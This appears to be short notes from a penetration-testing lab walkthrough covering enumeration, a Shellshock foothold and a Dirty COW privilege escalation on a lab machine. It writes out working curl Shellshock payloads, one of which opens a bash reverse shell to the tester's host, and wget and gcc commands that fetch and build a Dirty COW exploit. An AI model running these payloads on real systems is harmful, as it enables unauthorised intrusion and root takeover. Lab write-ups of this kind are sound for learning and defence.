NETWORK
ENUMERATION
A nikto scan has revealed a possible shellshock
FOOTHOLD
Vulnerable to shellshock
Running the following command
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://192.168.74.87/cgi-bin/test/test.cgi
We have confirmed that our machine is vulnerable to shellshock
Using the same approach we can also open a reverse shell
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/192.168.49.74/1234 0>&1' http://192.168.74.87/cgi-bin/test/test.cgi
PRIV ESCALATION
Dirty cow vulnerability
using linux-exploit-suggester, we can see that we can add a user to the system
wget http://192.168.49.74/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
bash linux-exploit-suggester.sh | tee -a linux-exploit-suggester
We have found more details about dirty cow in Exploit-db https://www.exploit-db.com/exploits/40839
On the server, let’s run
wget http://192.168.49.74/40839.c
PATH=/usr/include/linux:$PATH gcc -pthread 40839.c -o dirty -lcrypt
